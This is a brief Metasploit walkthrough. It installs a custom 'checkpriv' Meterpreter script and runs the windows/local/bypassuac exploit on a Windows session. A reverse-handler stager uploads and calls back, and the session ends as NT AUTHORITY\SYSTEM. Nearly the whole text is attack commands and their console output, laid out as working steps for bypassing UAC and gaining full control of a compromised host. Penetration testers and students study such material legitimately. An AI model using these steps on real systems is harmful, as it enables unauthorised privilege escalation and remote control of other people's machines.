Metasploit - bypassuac

Download: checkpriv

Installation:

cp checkpriv.rb /opt/metasploit-framework/scripts/meterpreter/checkpriv.rb

meterpreter > run checkpriv
[*] Admin token: false
[*] Running as SYSTEM: false
[*] UAC Enabled: true
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
msf exploit(bypassuac) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set SESSION 
SESSION => 
msf exploit(bypassuac) > run

[*] Started reverse handler on : 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable  bytes long being uploaded..
[*] Sending stage ( bytes) to 
[*] Meterpreter session  opened (: -> :) at -- :: +

meterpreter > getsystem
...got system via technique  (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run checkpriv
[*] Admin token: true
[*] Running as SYSTEM: true
[*] UAC Enabled: false